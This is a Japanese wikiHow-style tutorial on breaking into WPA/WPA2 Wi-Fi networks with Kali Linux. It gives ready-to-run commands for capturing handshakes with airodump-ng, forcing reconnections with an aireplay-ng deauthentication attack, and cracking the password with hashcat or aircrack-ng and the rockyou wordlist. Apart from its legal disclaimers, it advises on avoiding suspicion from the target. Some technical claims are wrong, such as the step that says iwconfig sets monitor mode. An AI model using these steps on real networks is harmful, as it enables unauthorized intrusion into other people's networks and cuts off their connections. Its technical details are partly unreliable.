パート 1 の 4:
無線LANに侵入する準備をする
パート 1 の 4:
-
1無線LANに合法的に侵入できる条件を理解する ほとんどの地域では、そのネットワークを所有しているか、そのネットワークへの侵入が明示的に許可されていない限り、WPA/WPA2のネットワークに侵入することはできません。
- 上記の条件を満たさないネットワークへの侵入は違法であり、犯罪に該当する可能性があります。
-
2「Kali Linux」のディスクイメージをダウンロードする 「Kali Linux」は、WPA/WPA2のネットワークに侵入するための推奨ツールです。「Kali Linux」のディスクイメージ(ISOファイル)をダウンロードするには、次の操作を行います。
- コンピュータのウェブブラウザからhttps://www.kali.org/downloads/にアクセスします。
- 任意のバージョンの左側にあるHTTPをクリックします。
- ファイルのダウンロードが完了するまで待ちます。
-
3USBフラッシュドライブをコンピュータに接続する 4GB以上の空き容量のあるUSBフラッシュドライブが必要になります。
-
4USBフラッシュドライブを起動可能にする USBフラッシュドライブをインストール先に指定するには必要な手順です。
- この手順では、Macを使用することもできます。
-
5「Kali Linux」のISOファイルをUSBフラッシュドライブに格納する USBフラッシュドライブを開いたら、ダウンロードした「Kali Linux」のISOファイルをUSBフラッシュドライブのウィンドウにドラッグします。
- 上記の操作後もUSBフラッシュドライブは接続したままにしておきましょう。
-
6「Kali Linux」をインストールする 「Kali Linux」をコンピュータにインストールするには、次の操作を行います。
- Windowsコンピュータを再起動します。
- BIOS画面に入ります。
- 「Boot Options」(または同様の)セクションからUSBフラッシュドライブ名を選択し、オプション一覧の一番上に移動させて、USBフラッシュドライブから起動するようにコンピュータを設定します。
- 保存して終了したら、「Kali Linux」のインストールウィンドウが表示されるまで待ちます(コンピュータをもう一度再起動する必要がある場合があります)。
- インストール画面の指示に従います。
-
7モニターモード(RFMON)に対応した無線LANカードを購入する 無線LANカードはオンラインストアまたは専門店で見つかます。無線LANカードを購入する際は、カードがモニターモードに対応しているか確認しましょう。対応していないと、ネットワークに侵入することはできません。
- コンピュータにはモニターモードに対応した無線LANカードが内蔵されている場合が多いので、「パート2」の手順1~4を試してから購入を検討しましょう。
- 「Kali Linux」を仮想マシンにインストールする場合は、コンピュータに内蔵されているカードに関係なく、無線LANカードが必要になります。
-
8「Kali Linux」をインストールしたコンピュータにrootでログインする ログイン時にrootのユーザー名とパスワードを入力します。
- 侵入中は常時rootアカウントにログインしている必要があります。
-
9「Kali Linux」をインストールしたコンピュータに無線LANカードを差し込む 無線LANカードのセットアップとドライバーのダウンロードがすぐに開始されます。プロンプトが表示されたら、画面の指示に従ってセットアップを完了しましょう。この手順が終われば、選択したネットワークへの侵入を進められるようになります。
- 無線LANカードのセットアップがすでに完了している場合は、ここでカードを差し込んで「Kali Linux」用にセットアップしなければなりません。
- ほとんどの場合、無線LANカードをパソコンに差し込むだけでセットアップが完了します。
パート 2 の 4:
無線LANに侵入する
パート 2 の 4:
-
1「Kali Linux」をインストールしたコンピュータで「ターミナル」を開く 「ターミナル」アプリのアイコンをクリックします。このアイコンとは、「>_」という文字がプリントされた黒い画面のようなアイコンのことです。
- Alt+Ctrl+Tを押しても、「ターミナル」を開くことができます。
-
2「Aircrack-ng」のインストールコマンドを入力する 以下のコマンドを入力して、↵ Enterを押します。
sudo apt-get install aircrack-ng
-
3プロンプトが表示されたら、パスワードを入力する コンピュータへのログインに使用するパスワードを入力して、↵ Enterを押します。これにより、「ターミナル」から他のコマンドをroot権限で実行できるようになります。
- 新しい「ターミナル」ウィンドウを開く場合は(本稿後半参照)、sudoというプレフィックスでコマンドを実行するか、パスワードを再入力する必要があります。
-
4「Aircrack-ng」をインストールする プロンプトが表示されたらYを押して、プログラムのインストールが完了するまで待ちます。
-
5「airmon-ng」を有効にする 以下のコマンドを入力して、↵ Enterを押します。
airmon-ng
-
6インターフェース名を調べる インターフェース名は「Interface」列に表示されています。
- 自分のネットワークに侵入する場合は、通常、「wlan0」というインターフェース名になります。
- インターフェース名が表示されていない場合は、無線LANカードがモニターモードに対応していないということになります。
-
7モニターモードに移行する 以下のコマンドを入力して、↵ Enterを押します。
airmon-ng start wlan0
- 対象のインターフェース名が違う場合は、インターフェース名を「wlan0」に置き換えましょう。
-
8インターフェースをモニターモードに変更する 以下のコマンドを入力します。
iwconfig
-
9エラーを返す処理をすべて終了させる 場合によっては、コンピュータで実行中のプログラムと無線LANカードが競合してしまうことがあります。これらの処理を終了させるには、以下のコマンドを入力します。[1]
airmon-ng check kill
-
10対象のインターフェース名を確認する ほとんどの場合は、「mon0」または「wlan0mon」のようなインターフェース名になります。[2]
-
11周辺の無線ネットワークを検索する 周辺の無線ネットワークをすべて表示するには、以下のコマンドを入力します。
airodump-ng mon0
- 「mon0」は上記のインターフェース名に置き換えましょう。
-
12侵入対象のネットワークを見つける 各文字列の最後にネットワーク識別子が表示されるので、侵入対象のネットワークに属するものを見つけます。
-
13対象のネットワークがWPA/WPA2セキュリティに設定されているか確認する ネットワーク識別子のすぐ左に「WPA」または「WPA2」と表示されている場合は、次の手順に進みます。それ以外の場合は、そのネットワークに侵入するはできないということになります。
-
14MACアドレスとチャネルの値をメモする ネットワーク識別子の左側に表示されています。
- MACアドレス—同列の左端にある数列のことです。
- チャネル—「WPA/WPA2」というタグのすぐ左にある値(0、1、2など)のことです。
-
15対象のネットワークをモニターして、ハンドシェイクを取得する 「ハンドシェイク」は、端末をネットワークに接続した時(コンピュータをルーターに接続した時など)に発生します。コマンドの必須構成要素を対象のネットワーク情報に置き換えるには、以下のコードを入力します。
airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0
- 「channel」は上記のチャネル値に置き換えます。
- 「MAC」は上記のMACアドレスに置き換えます。
- 「mon0」はインターフェース名に置き換えます。
- アドレスの例は次の通りです。
airodump-ng -c 3 --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/ wlan0mon
-
16ハンドシェイクが発生するまで待つ 画面の右上に「WPA handshake:」というタグと、その左側にMACアドレスが一列で表示されたら、次の手順に進みます。
- ハンドシェイクが発生するまで待てない場合は、認証解除攻撃でハンドシェイクを強制してから、次の手順に進みます。
-
17「airodump-ng」を終了させたら、デスクトップを表示する Ctrl+Cを押して「airodump-ng」を終了させたら、「.cap」ファイルがデスクトップに表示されたことを確認します。
-
18「.cap」ファイルのファイル名を変更する 必ず必要というわけではありませんが、これで後々作業がしやすくなります。「name」を任意のファイル名に置き換えるには、以下のコマンドを入力して、ファイル名を変更します。
mv ./-01.cap name.cap
- 「.cap」ファイルのファイル名が「-01.cap」でない場合は、「-01.cap」を「.cap」ファイルのファイル名に置き換えましょう。
-
19「.cap」ファイルを「.hccapx」形式に変換する 「Kali Linux」のファイルコンバーターを使用します。「name」を対象のファイル名に置き換えるには、以下のコマンドを入力します。
cap2hccapx.bin name.cap name.hccapx
- https://hashcat.net/cap2hccapx/にアクセスし、ファイルを選択をクリックしてファイルを選択することにより、「.cap」ファイルをファイルコンバーターにアップロードすることもできます。ファイルをアップロードしたら、Convertをクリックしてファイルを変換し、デスクトップにダウンロードして次の手順に進みます。
-
20「naive-hashcat」をインストールする パスワードクラックに使用するサービスのことです。「naive-hashcat」をインストールするには、以下のコマンドを順番に入力します。
sudo git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- コンピュータにGPUが搭載されていない場合は、「aircrack-ng」を使用する必要があります。
-
21「naive-hashcat」を実行する インストールが完了したら、以下のコマンドを入力します(「name」は「.cap」ファイルのファイル名に置き換えましょう)。
HASH_FILE=name.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hashcat.sh
-
22パスワードクラックが完了するまで待つ パスワードクラックが完了すると、パスワードの文字列が「naive-hashcat」ディレクトリ内の「name.pot」ファイルに追加されます。なお、最後のコロン以降の単語または語句がパスワードになります。
- パスワードクラックには、数時間から数か月かかる可能性があります。
パート 3 の 4:
「Aircrack-ng」をGPU非搭載のコンピュータで使用する
パート 3 の 4:
-
1辞書ファイルをダウンロードする 最もよく使用される辞書ファイルに「Rock You」というものがあります。このファイルをダウンロードするには、以下のコマンドを入力します。
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- パスワードが単語リストにない場合は、「aircrack-ng」でWPA/WPA2のパスワードをクラックすることはできないので注意しましょう。
-
2「Aircrack-ng」でパスワードクラックを開始させる 以下のコマンドを入力し、必要に応じてネットワーク情報を修正します。
aircrack-ng -a2 -b MAC -w rockyou.txt name.cap
- WPA2ネットワークではなくWPAネットワークをクラックする場合は、「-a2」を-aに置き換えましょう。
- 「MAC」は上記のMACアドレスに置き換えます。
- 「name」は「.cap」ファイルのファイル名に置き換えます。
-
3「ターミナル」で結果が表示されるのを待つ 「KEY FOUND!」というメッセージが表示された場合は、「aircrack-ng」でパスワードが見つかったということになります。パスワードは「KEY FOUND!」の右側の角括弧内に表示されます。
パート 4 の 4:
認証解除攻撃でハンドシェイクを強制する
パート 4 の 4:
-
1認証解除攻撃とは何かを理解する 認証解除攻撃を行い、不正の認証解除パケットを侵入対象のルーターに送信すると、対象のインターネットが切断されて、ユーザーは再度ログインするように求められます。そこで、ユーザーが再度ログインすると、こちらはハンドシェイクを傍受することができるのです。
-
2ネットワークをモニターする 以下のコマンドを入力し、必要に応じてネットワーク情報を修正します。
airodump-ng -c channel --bssid MAC
- コマンドの例は次の通りです。
airodump-ng -c 1 --bssid 9C:5C:8E:C9:AB:C0
- コマンドの例は次の通りです。
-
3ネットワークに接続されるのを待つ MACアドレスが2つ並んで表示されたら(また、その右側には製造元名を含む文字列も表示される)、次の手順に進みます。
- これで、クライアント(コンピュータなど)はネットワークに接続されたということになります。
-
4新しい「ターミナル」ウィンドウを開く Alt+Ctrl+Tを押せば、新しい「ターミナル」ウィンドウが開きます。その際には、バックグラウンドの「ターミナル」ウィンドウで「airodump-ng」がまだ実行中なのか確認しましょう。
-
5認証解除パケットを送信する 以下のコマンドを入力し、必要に応じてネットワーク情報を修正します。 [3]
aireplay-ng -0 2 -a MAC1 -c MAC2 mon0
- 「2」は、送信するパケットの数を表しています。この数は増減させることができますが、3つ以上のパケットを送信すると、深刻なセキュリティ侵害が発生してしまう可能性があるので注意しましょう。
- 「MAC1」は、バックグラウンドの「ターミナル」ウィンドウの一番下にある左端のMACアドレスに置き換えます。
- 「MAC2」は、バックグラウンドの「ターミナル」ウィンドウの一番下にある右端のMACアドレスに置き換えます。
- 「mon0」は、コンピュータでルーターを最初に検索した際に表示されたインターフェース名に置き換えます。
- コマンドの例は次の通りです。
aireplay-ng -0 3 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
-
6元の「ターミナル」ウィンドウを再度開く 認証解除パケットの送信が完了したら、バックグラウンドの「ターミナル」ウィンドウに戻ります。
-
7ハンドシェイクを調べる 「WPA handshake:」というタグと、その左側にMACアドレスが表示されたら、ネットワークへの侵入を進めていきましょう。
ポイント
- 上記の方法で、サーバーを立ち上げる前に自分の無線LANの弱点を調べておけば、同様の攻撃に備えてシステムを準備することができます。
広告
注意事項
- ほとんどの国では、許可なく他人の無線LANに侵入する行為は違法です。上記の手順は、そのネットワークを所有しているか、そのネットワークへの侵入が明示的に許可されていない限り行わないようにしましょう。
- 2つ以上の認証解除パケットを送信すると、対象のコンピュータがクラッシュしてしまい、その結果、怪しまれてしまう可能性があります。
出典
このwikiHow記事について
他言語版
Bahasa Indonesia:Meretas Wi Fi WPA/WPA2 Dengan Kali Linux
Nederlands:WPA, WPA2 of wifi hacken met Kali Linux
Tiếng Việt:Hack Wi Fi WPA/WPA2 bằng Kali Linux
このページは 14,317 回アクセスされました。